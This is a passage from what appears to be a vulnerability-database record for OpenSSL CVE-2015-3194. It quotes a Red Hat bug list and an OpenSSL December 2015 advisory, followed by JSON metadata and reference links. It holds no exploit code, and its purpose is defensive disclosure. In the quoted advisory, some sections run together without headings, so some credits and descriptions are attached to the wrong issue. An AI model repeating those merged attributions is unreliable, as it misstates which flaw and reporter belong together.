openssl: ASN.1 BIO handling of large amounts of data\n1331402 - CVE-2016-2108 openssl: Memory corruption in the ASN.1 encoder\n1331426 - CVE-2016-2107 openssl: Padding oracle in AES-NI CBC MAC check\n1331441 - CVE-2016-2105 openssl: EVP_EncodeUpdate overflow\n1331536 - CVE-2016-2106 openssl: EVP_EncryptUpdate overflow\n1332443 - CVE-2016-3705 libxml2: stack overflow before detecting invalid XML file\n1332820 - CVE-2016-4483 libxml2: out-of-bounds read\n1338682 - CVE-2016-1833 libxml2: Heap-based buffer overread in htmlCurrentChar\n1338686 - CVE-2016-4447 libxml2: Heap-based buffer underreads due to xmlParseName\n1338691 - CVE-2016-1835 libxml2: Heap use-after-free in xmlSAX2AttributeNs\n1338696 - CVE-2016-1837 libxml2: Heap use-after-free in htmlPArsePubidLiteral and htmlParseSystemiteral\n1338700 - CVE-2016-4448 libxml2: Format string vulnerability\n1338701 - CVE-2016-4449 libxml2: Inappropriate fetch of entities content\n1338702 - CVE-2016-1836 libxml2: Heap use-after-free in xmlDictComputeFastKey\n1338703 - CVE-2016-1839 libxml2: Heap-based buffer overread in xmlDictAddString\n1338705 - CVE-2016-1838 libxml2: Heap-based buffer overread in xmlPArserPrintFileContextInternal\n1338706 - CVE-2016-1840 libxml2: Heap-buffer-overflow in xmlFAParserPosCharGroup\n1338708 - CVE-2016-1834 libxml2: Heap-buffer-overflow in xmlStrncat\n1338711 - CVE-2016-1762 libxml2: Heap-based buffer-overread in xmlNextChar\n1341583 - CVE-2016-4459 mod_cluster: Buffer overflow in mod_manager when sending request with long JVMRoute\n1341705 - CVE-2016-2177 openssl: Possible integer overflow vulnerabilities in codebase\n1343400 - CVE-2016-2178 openssl: Non-constant time codepath followed for certain operations in DSA implementation\n1362183 - CVE-2016-5419 curl: TLS session resumption client cert bypass\n1362190 - CVE-2016-5420 curl: Re-using connection with wrong client cert\n1373229 - CVE-2016-7141 curl: Incorrect reuse of client certificates\n1382352 - CVE-2016-6808 mod_jk: Buffer overflow when concatenating virtual host name and URI\n1387605 - CVE-2016-8612 JBCS mod_cluster: Protocol parsing logic error\n\n5. JIRA issues fixed (https://issues.jboss.org/):\n\nJBCS-50 - CVE-2012-1148 CVE-2012-0876 expat: various flaws [jbews-3.0.0]\nJBCS-95 - CVE-2014-3523 httpd: WinNT MPM denial of service\n\n6. \n\nNOTE: WE ANTICIPATE THAT 1.0.0t AND 0.9.8zh WILL BE THE LAST RELEASES FOR THE\n0.9.8 AND 1.0.0 VERSIONS AND THAT NO MORE SECURITY FIXES WILL BE PROVIDED (AS\nPER PREVIOUS ANNOUNCEMENTS). USERS ARE ADVISED TO UPGRADE TO LATER VERSIONS. \n\nBN_mod_exp may produce incorrect results on x86_64 (CVE-2015-3193)\n==================================================================\n\nSeverity: Moderate\n\nThere is a carry propagating bug in the x86_64 Montgomery squaring procedure. No\nEC algorithms are affected. Analysis suggests that attacks against RSA and DSA\nas a result of this defect would be very difficult to perform and are not\nbelieved likely. Attacks against DH are considered just feasible (although very\ndifficult) because most of the work necessary to deduce information\nabout a private key may be performed offline. The amount of resources\nrequired for such an attack would be very significant and likely only\naccessible to a limited number of attackers. An attacker would\nadditionally need online access to an unpatched system using the target\nprivate key in a scenario with persistent DH parameters and a private\nkey that is shared between multiple clients. For example this can occur by\ndefault in OpenSSL DHE based SSL/TLS ciphersuites. \n\nThis issue affects OpenSSL version 1.0.2. \n\nOpenSSL 1.0.2 users should upgrade to 1.0.2e\n\nThis issue was reported to OpenSSL on August 13 2015 by Hanno\nB\u00f6ck. The fix was developed by Andy Polyakov of the OpenSSL\ndevelopment team. Since these routines are used to verify\ncertificate signature algorithms this can be used to crash any certificate\nverification operation and exploited in a DoS attack. \n\nThis issue affects OpenSSL versions 1.0.2 and 1.0.1. \n\nOpenSSL 1.0.2 users should upgrade to 1.0.2e\nOpenSSL 1.0.1 users should upgrade to 1.0.1q\n\nThis issue was reported to OpenSSL on August 27 2015 by Lo\u00efc Jonas Etienne\n(Qnective AG). The fix was developed by Dr. Stephen Henson of the OpenSSL\ndevelopment team. This structure is used by the PKCS#7 and CMS routines so any\napplication which reads PKCS#7 or CMS data from untrusted sources is affected. \nSSL/TLS is not affected. \n\nThis issue affects OpenSSL versions 1.0.2 and 1.0.1, 1.0.0 and 0.9.8. \n\nOpenSSL 1.0.2 users should upgrade to 1.0.2e\nOpenSSL 1.0.1 users should upgrade to 1.0.1q\nOpenSSL 1.0.0 users should upgrade to 1.0.0t\nOpenSSL 0.9.8 users should upgrade to 0.9.8zh\n\nThis issue was reported to OpenSSL on November 9 2015 by Adam Langley\n(Google/BoringSSL) using libFuzzer. The fix was developed by Dr. Stephen\nHenson of the OpenSSL development team. \n\nRace condition handling PSK identify hint (CVE-2015-3196)\n=========================================================\n\nSeverity: Low\n\nIf PSK identity hints are received by a multi-threaded client then\nthe values are wrongly updated in the parent SSL_CTX structure. \n\nThis issue was fixed in OpenSSL 1.0.2d and 1.0.1p but has not been previously\nlisted in an OpenSSL security advisory. This issue also affects OpenSSL 1.0.0\nand has not been previously fixed in an OpenSSL 1.0.0 release. \n\nThe fix was developed by Dr. Stephen Henson of the OpenSSL development team. \n\nAnon DH ServerKeyExchange with 0 p parameter (CVE-2015-1794)\n============================================================\n\nSeverity: Low\n\nIf a client receives a ServerKeyExchange for an anonymous DH ciphersuite with\nthe value of p set to 0 then a seg fault can occur leading to a possible denial\nof service attack. \n\nThis issue affects OpenSSL version 1.0.2. \n\nOpenSSL 1.0.2 users should upgrade to 1.0.2e\n\nThis issue was reported to OpenSSL on August 3 2015 by Guy Leaver (Cisco). The\nfix was developed by Matt Caswell of the OpenSSL development team. \n\nNote\n====\n\nAs per our previous announcements and our Release Strategy\n(https://www.openssl.org/about/releasestrat.html), support for OpenSSL versions\n1.0.0 and 0.9.8 will cease on 31st December 2015. No security updates for these\nversions will be provided after that date. In the absence of significant\nsecurity issues being identified prior to that date, the 1.0.0t and 0.9.8zh\nreleases will be the last for those versions. Users of these versions are\nadvised to upgrade. \n\n\nReferences\n==========\n\nURL for this Security Advisory:\nhttps://www.openssl.org/news/secadv/20151203.txt\n\nNote: the online version of the advisory may be updated with additional\ndetails over time. \n\nFor details of OpenSSL severity classifications please see:\nhttps://www.openssl.org/about/secpolicy.html\n\n", "sources": [ { "db": "NVD", "id": "CVE-2015-3194" }, { "db": "JVNDB", "id": "JVNDB-2015-006115" }, { "db": "BID", "id": "78623" }, { "db": "VULMON", "id": "CVE-2015-3194" }, { "db": "PACKETSTORM", "id": "137294" }, { "db": "PACKETSTORM", "id": "134782" }, { "db": "PACKETSTORM", "id": "137292" }, { "db": "PACKETSTORM", "id": "134859" }, { "db": "PACKETSTORM", "id": "134650" }, { "db": "PACKETSTORM", "id": "136992" }, { "db": "PACKETSTORM", "id": "140182" }, { "db": "PACKETSTORM", "id": "169632" } ], "trust": 2.7 }, "external_ids": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/external_ids#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "db": "NVD", "id": "CVE-2015-3194", "trust": 3.0 }, { "db": "BID", "id": "78623", "trust": 1.4 }, { "db": "JUNIPER", "id": "JSA10761", "trust": 1.4 }, { "db": "BID", "id": "91787", "trust": 1.1 }, { "db": "PULSESECURE", "id": "SA40100", "trust": 1.1 }, { "db": "SIEMENS", "id": "SSA-412672", "trust": 1.1 }, { "db": "SECTRACK", "id": "1034294", "trust": 1.1 }, { "db": "JUNIPER", "id": "JSA10759", "trust": 1.1 }, { "db": "JVN", "id": "JVNVU95113540", "trust": 0.8 }, { "db": "JVNDB", "id": "JVNDB-2015-006115", "trust": 0.8 }, { "db": "MCAFEE", "id": "SB10203", "trust": 0.3 }, { "db": "ICS CERT", "id": "ICSA-22-349-21", "trust": 0.1 }, { "db": "VULMON", "id": "CVE-2015-3194", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "137294", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "134782", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "137292", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "134859", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "134650", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "136992", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "140182", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "169632", "trust": 0.1 } ], "sources": [ { "db": "VULMON", "id": "CVE-2015-3194" }, { "db": "BID", "id": "78623" }, { "db": "JVNDB", "id": "JVNDB-2015-006115" }, { "db": "PACKETSTORM", "id": "137294" }, { "db": "PACKETSTORM", "id": "134782" }, { "db": "PACKETSTORM", "id": "137292" }, { "db": "PACKETSTORM", "id": "134859" }, { "db": "PACKETSTORM", "id": "134650" }, { "db": "PACKETSTORM", "id": "136992" }, { "db": "PACKETSTORM", "id": "140182" }, { "db": "PACKETSTORM", "id": "169632" }, { "db": "NVD", "id": "CVE-2015-3194" } ] }, "id": "VAR-201512-0483", "iot": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/iot#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": true, "sources": [ { "db": "VARIoT devices database", "id": null } ], "trust": 0.391459985 }, "last_update_date": "2024-07-22T22:33:37.136000Z", "patch": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/patch#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "title": "HPSBMU03590", "trust": 0.8, "url": "https://h20566.www2.hpe.com/hpsc/doc/public/display?docid=emr_na-c05131085" }, { "title": "HPSBMU03611", "trust": 0.8, "url": "https://h20566.www2.hpe.com/hpsc/doc/public/display?docid=emr_na-c05150888" }, { "title": "HPSBMU03612", "trust": 0.8, "url": "https://h20566.www2.hpe.com/hpsc/doc/public/display?docid=emr_na-c05158380" }, { "title": "OpenSSL 1.0.2 Series Release Notes", "trust": 0.8, "url": "https://www.openssl.org/news/openssl-1.0.2-notes.html" }, { "title": "OpenSSL 1.0.1 Series Release Notes", "trust": 0.8, "url": "https://www.openssl.org/news/openssl-1.0.1-notes.html" }, { "title": "Release Strategy", "trust": 0.8, "url": "https://www.openssl.org/policies/releasestrat.html" }, { "title": "Add PSS parameter check. (d8541d7)", "trust": 0.8, "url": "https://git.openssl.org/?p=openssl.git;a=commit;h=d8541d7e9e63bf5f343af24644046c8d96498c17" }, { "title": "Add PSS parameter check. (c394a48)", "trust": 0.8, "url": "https://git.openssl.org/?p=openssl.git;a=commit;h=c394a488942387246653833359a5c94b5832674e" }, { "title": "Certificate verify crash with missing PSS parameter (CVE-2015-3194)", "trust": 0.8, "url": "http://openssl.org/news/secadv/20151203.txt" }, { "title": "Oracle Critical Patch Update Advisory - April 2016", "trust": 0.8, "url": "http://www.oracle.com/technetwork/security-advisory/cpuapr2016v3-2985753.html" }, { "title": "Oracle Critical Patch Update CVSS V2 Risk Matrices - April 2016", "trust": 0.8, "url": "http://www.oracle.com/technetwork/topics/security/cpuapr2016-2881694.html" }, { "title": "Text Form of Oracle Critical Patch Update - April 2016 Risk Matrices", "trust": 0.8, "url": "http://www.oracle.com/technetwork/topics/security/cpuapr2016verbose-2881709.html" }, { "title": "Oracle Critical Patch Update Advisory - July 2016", "trust": 0.8, "url": "http://www.oracle.com/technetwork/security-advisory/cpujul2016-2881720.html" }, { "title": "Text Form of Oracle Critical Patch Update - July 2016 Risk Matrices", "trust": 0.8, "url": "http://www.oracle.com/technetwork/topics/security/cpujul2016verbose-2881721.html" }, { "title": "Oracle Solaris Third Party Bulletin - January 2016", "trust": 0.8, "url": "http://www.oracle.com/technetwork/topics/security/bulletinjan2016-2867206.html" }, { "title": "Bug 1288320", "trust": 0.8, "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1288320" }, { "title": "July 2016 Critical Patch Update Released", "trust": 0.8, "url": "https://blogs.oracle.com/security/entry/july_2016_critical_patch_update" }, { "title": "April 2016 Critical Patch Update Released", "trust": 0.8, "url": "https://blogs.oracle.com/security/entry/april_2016_critical_patch_update" }, { "title": "Red Hat: Moderate: openssl security update", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=rhsa-20152617 - security advisory" }, { "title": "Debian Security Advisories: DSA-3413-1 openssl -- security update", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=debian_security_advisories\u0026qid=82bedc073c0f22b408ebaf092ed8621c" }, { "title": "Red Hat: CVE-2015-3194", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_cve_database\u0026qid=cve-2015-3194" }, { "title": "Ubuntu Security Notice: openssl vulnerabilities", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=ubuntu_security_notice\u0026qid=usn-2830-1" }, { "title": "Amazon Linux AMI: ALAS-2015-614", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=amazon_linux_ami\u0026qid=alas-2015-614" }, { "title": "Tenable Security Advisories: [R7] OpenSSL \u002720151203\u0027 Advisory Affects Tenable SecurityCenter", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=tenable_security_advisories\u0026qid=tns-2016-01" }, { "title": "Forcepoint Security Advisories: CVE-2015-3194, 3195, 3196 -- Security Vulnerabilities", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=forcepoint_security_advisories\u0026qid=62ab21cc073446940abce12c35db3049" }, { "title": "Cisco: Multiple Vulnerabilities in OpenSSL (December 2015) Affecting Cisco Products", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=cisco_security_advisories_and_alerts_ciscoproducts\u0026qid=cisco-sa-20151204-openssl" }, { "title": "Red Hat: Important: Red Hat JBoss Core Services Apache HTTP 2.4.23 Release", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=rhsa-20162957 - security advisory" }, { "title": "Symantec Security Advisories: SA105 : OpenSSL Vulnerabilities 3-Dec-2015", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=symantec_security_advisories\u0026qid=a924415f718a299b2d1e8046890941f3" }, { "title": "Debian CVElist Bug Report Logs: Security fixes from the April 2016 CPU", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=debian_cvelist_bugreportlogs\u0026qid=6bed8fb34e63f7953d08e5701d75ec01" }, { "title": "Oracle Linux Bulletins: Oracle Linux Bulletin - October 2015", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=oracle_linux_bulletins\u0026qid=435ed9abc2fb1e74ce2a69605a01e326" }, { "title": "Oracle: Oracle Critical Patch Update Advisory - October 2017", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=oracle_advisories\u0026qid=523d3f220a64ff01dd95e064bd37566a" }, { "title": "Oracle Solaris Third Party Bulletins: Oracle Solaris Third Party Bulletin - January 2016", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=oracle_solaris_third_party_bulletins\u0026qid=eb439566c9130adc92d21bc093204cf8" }, { "title": "Oracle: Oracle Critical Patch Update Advisory - April 2016", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=oracle_advisories\u0026qid=122319027ae43d6d626710f1b1bb1d43" }, { "title": "Oracle: Oracle Critical Patch Update Advisory - July 2016", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=oracle_advisories\u0026qid=3a04485ebb79f7fbc2472bf9af5ce489" }, { "title": "", "trust": 0.1, "url": "https://github.com/live-hack-cve/cve-2015-3194 " }, { "title": "changelog", "trust": 0.1, "url": "https://github.com/halon/changelog " } ], "sources": [ { "db": "VULMON", "id": "CVE-2015-3194" }, { "db": "JVNDB", "id": "JVNDB-2015-006115" } ] }, "problemtype_data": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "problemtype": "CWE-476", "trust": 1.0 }, { "problemtype": "CWE-Other", "trust": 0.8 } ], "sources": [ { "db": "JVNDB", "id": "JVNDB-2015-006115" }, { "db": "NVD", "id": "CVE-2015-3194" } ] }, "references": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/references#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "trust": 1.5, "url": "http://openssl.org/news/secadv/20151203.txt" }, { "trust": 1.4, "url": "http://www.fortiguard.com/advisory/openssl-advisory-december-2015" }, { "trust": 1.4, "url": "http://www.oracle.com/technetwork/topics/security/bulletinjan2016-2867206.html" }, { "trust": 1.4, "url": "http://www.oracle.com/technetwork/topics/security/linuxbulletinoct2015-2719645.html" }, { "trust": 1.4, "url": "http://www.oracle.com/technetwork/security-advisory/cpujul2016-2881720.html" }, { "trust": 1.2, "url": "http://rhn.redhat.com/errata/rhsa-2015-2617.html" }, { "trust": 1.2, "url": "http://rhn.redhat.com/errata/rhsa-2016-2957.html" }, { "trust": 1.1, "url": "http://lists.opensuse.org/opensuse-updates/2015-12/msg00071.html" }, { "trust": 1.1, "url": "http://www.debian.org/security/2015/dsa-3413" }, { "trust": 1.1, "url": "http://lists.fedoraproject.org/pipermail/package-announce/2015-december/173801.html" }, { "trust": 1.1, "url": "http://lists.opensuse.org/opensuse-updates/2015-12/msg00087.html" }, { "trust": 1.1, "url": "http://fortiguard.com/advisory/openssl-advisory-december-2015" }, { "trust": 1.1, "url": "http://lists.opensuse.org/opensuse-security-announce/2016-03/msg00009.html" }, { "trust": 1.1, "url": "http://lists.opensuse.org/opensuse-security-announce/2016-05/msg00053.html" }, { "trust": 1.1, "url": "http://www.securityfocus.com/bid/78623" }, { "trust": 1.1, "url": "https://h20566.www2.hpe.com/portal/site/hpsc/public/kb/docdisplay?docid=emr_na-c04944173" }, { "trust": 1.1, "url": "https://h20566.www2.hpe.com/portal/site/hpsc/public/kb/docdisplay?docid=emr_na-c05158380" }, { "trust": 1.1, "url": "https://h20566.www2.hpe.com/portal/site/hpsc/public/kb/docdisplay?docid=emr_na-c05150888" }, { "trust": 1.1, "url": "http://www.securityfocus.com/bid/91787" }, { "trust": 1.1, "url": "https://h20566.www2.hpe.com/portal/site/hpsc/public/kb/docdisplay?docid=emr_na-c05131085" }, { "trust": 1.1, "url": "https://h20566.www2.hpe.com/portal/site/hpsc/public/kb/docdisplay?docid=emr_na-c05111017" }, { "trust": 1.1, "url": "https://h20566.www2.hpe.com/portal/site/hpsc/public/kb/docdisplay?docid=emr_na-c05157667" }, { "trust": 1.1, "url": "http://marc.info/?l=bugtraq\u0026m=145382583417444\u0026w=2" }, { "trust": 1.1, "url": "http://www.oracle.com/technetwork/security-advisory/cpuapr2016v3-2985753.html" }, { "trust": 1.1, "url": "https://kb.pulsesecure.net/articles/pulse_security_advisories/sa40100" }, { "trust": 1.1, "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1288320" }, { "trust": 1.1, "url": "http://tools.cisco.com/security/center/content/ciscosecurityadvisory/cisco-sa-20151204-openssl" }, { "trust": 1.1, "url": "http://www.ubuntu.com/usn/usn-2830-1" }, { "trust": 1.1, "url": "http://www.slackware.com/security/viewer.php?l=slackware-security\u0026y=2015\u0026m=slackware-security.754583" }, { "trust": 1.1, "url": "http://lists.opensuse.org/opensuse-updates/2015-12/msg00070.html" }, { "trust": 1.1, "url": "http://kb.juniper.net/infocenter/index?page=content\u0026id=jsa10759" }, { "trust": 1.1, "url": "http://kb.juniper.net/infocenter/index?page=content\u0026id=jsa10761" }, { "trust": 1.1, "url": "https://h20566.www2.hpe.com/portal/site/hpsc/public/kb/docdisplay?docid=emr_na-c05398322" }, { "trust": 1.1, "url": "http://www.securitytracker.com/id/1034294" }, { "trust": 1.1, "url": "http://www.oracle.com/technetwork/security-advisory/cpuoct2017-3236626.html" }, { "trust": 1.1, "url": "https://cert-portal.siemens.com/productcert/pdf/ssa-412672.pdf" }, { "trust": 1.1, "url": "https://git.openssl.org/?p=openssl.git%3ba=commit%3bh=c394a488942387246653833359a5c94b5832674e" }, { "trust": 1.1, "url": "https://git.openssl.org/?p=openssl.git%3ba=commit%3bh=d8541d7e9e63bf5f343af24644046c8d96498c17" }, { "trust": 0.9, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2015-3194" }, { "trust": 0.8, "url": "http://jvn.jp/vu/jvnvu95113540/" }, { "trust": 0.8, "url": "http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2015-3194" }, { "trust": 0.8, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-3194" }, { "trust": 0.7, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-3195" }, { "trust": 0.5, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-3196" }, { "trust": 0.4, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-0799" }, { "trust": 0.3, "url": "https://kb.netapp.com/support/index?page=content\u0026id=9010051\u0026actp=rss" }, { "trust": 0.3, "url": "http://openssl.org/" }, { "trust": 0.3, "url": "https://kb.juniper.net/infocenter/index?page=content\u0026id=jsa10761\u0026cat=sirt_1\u0026actp=list" }, { "trust": 0.3, "url": "http://prod.lists.apple.com/archives/security-announce/2016/oct/msg00005.html" }, { "trust": 0.3, "url": "https://kc.mcafee.com/corporate/index?page=content\u0026id=sb10203" }, { "trust": 0.3, "url": "http://seclists.org/bugtraq/2015/dec/23" }, { "trust": 0.3, "url": "https://h20564.www2.hpe.com/hpsc/doc/public/display?docid=emr_na-c05398322" }, { "trust": 0.3, "url": "https://h20564.www2.hpe.com/hpsc/doc/public/display?docid=emr_na-c04944173" }, { "trust": 0.3, "url": "https://h20564.www2.hpe.com/hpsc/doc/public/display?docid=emr_na-c05131085 " }, { "trust": 0.3, "url": "https://h20564.www2.hpe.com/hpsc/doc/public/display?docid=emr_na-c05157667" }, { "trust": 0.3, "url": "https://h20564.www2.hpe.com/hpsc/doc/public/display?docid=emr_na-c05150888" }, { "trust": 0.3, "url": "https://h20564.www2.hpe.com/hpsc/doc/public/display?docid=emr_na-c05158380" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=isg3t1023836" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=isg3t1023987" }, { "trust": 0.3, "url": "https://www-947.ibm.com/support/entry/portal/docdisplay?lndocid=migr-5099196" }, { "trust": 0.3, "url": "https://www-947.ibm.com/support/entry/portal/docdisplay?lndocid=migr-5099199" }, { "trust": 0.3, "url": "https://www-947.ibm.com/support/entry/portal/docdisplay?lndocid=migr-5099200" }, { "trust": 0.3, "url": "https://www-947.ibm.com/support/entry/portal/docdisplay?lndocid=migr-5099210" }, { "trust": 0.3, "url": "https://www-947.ibm.com/support/entry/portal/docdisplay?lndocid=migr-5099426" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21981021" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=nas8n1021091" }, { "trust": 0.3, "url": "https://www.pexip.com/sites/pexip/files/pexip_security_bulletin_2016-02-17.pdf" }, { "trust": 0.3, "url": "https://networks.unify.com/security/advisories/obso-1512-02.pdf" }, { "trust": 0.3, "url": "http://www.ibm.com/support/docview.wss?uid=swg21979528" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg2c1000128" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21978415" }, { "trust": 0.3, "url": "http://www.ibm.com/support/docview.wss?uid=swg21979761" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=ssg1s1005656" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=ssg1s1005657" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=ssg1s1005669" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=ssg1s1005694" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=ssg1s1005702" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21974168" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21974459" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21976148" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21976419" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21977265" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21978085" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21978238" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21978239" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21979086" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21980207" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21980965" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21980969" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21981765" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21982172" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21982877" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21982883" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21983532" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21984021" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21985739" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21986593" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg2c1000058" }, { "trust": 0.3, "url": "http://aix.software.ibm.com/aix/efixes/security/openssl_advisory15.asc" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21983823" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21982347" }, { "trust": 0.3, "url": "https://h20564.www2.hpe.com/portal/site/hpsc/public/kb/docdisplay?docid=emr_n" }, { "trust": 0.3, "url": "http://www.hpe.com/support/security_bulletin_archive" }, { "trust": 0.3, "url": "http://www.hpe.com/support/subscriber_choice" }, { "trust": 0.3, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-0705" }, { "trust": 0.2, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-1789" }, { "trust": 0.2, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-2842" }, { "trust": 0.2, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-1791" }, { "trust": 0.2, "url": "https://www.redhat.com/mailman/listinfo/rhsa-announce" }, { "trust": 0.2, "url": "https://access.redhat.com/security/cve/cve-2015-3194" }, { "trust": 0.2, "url": "https://access.redhat.com/security/cve/cve-2015-3195" }, { "trust": 0.2, "url": "https://bugzilla.redhat.com/):" }, { "trust": 0.2, "url": "https://access.redhat.com/security/cve/cve-2015-3196" }, { "trust": 0.2, "url": "https://access.redhat.com/security/team/contact/" }, { "trust": 0.2, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-6565" }, { "trust": 0.2, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-1794" }, { "trust": 0.2, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-3193" }, { "trust": 0.1, "url": "https://cwe.mitre.org/data/definitions/476.html" }, { "trust": 0.1, "url": "https://github.com/live-hack-cve/cve-2015-3194" }, { "trust": 0.1, "url": "https://access.redhat.com/errata/rhsa-2015:2617" }, { "trust": 0.1, "url": "https://nvd.nist.gov" }, { "trust": 0.1, "url": "https://usn.ubuntu.com/2830-1/" }, { "trust": 0.1, "url": "https://www.cisa.gov/uscert/ics/advisories/icsa-22-349-21" }, { "trust": 0.1, "url": "http://tools.cisco.com/security/center/viewalert.x?alertid=42530" }, { "trust": 0.1, "url": "http://h20564.www2.hpe.com/hpsc/swd/public" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-0705" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2008-5161" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-5600" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-0800" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-3566" }, { "trust": 0.1, "url": "https://access.redhat.com/security/team/key/" }, { "trust": 0.1, "url": "https://access.redhat.com/articles/11258" }, { "trust": 0.1, "url": "https://access.redhat.com/security/updates/classification/#moderate" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-7995" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2007-6750" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-1790" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-8035" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-1788" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-1792" }, { "trust": 0.1, "url": "http://h20564.www2.hpe.com/hpsc/doc/public/display?docid=emr_na-c05131085" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-3567" }, { "trust": 0.1, "url": 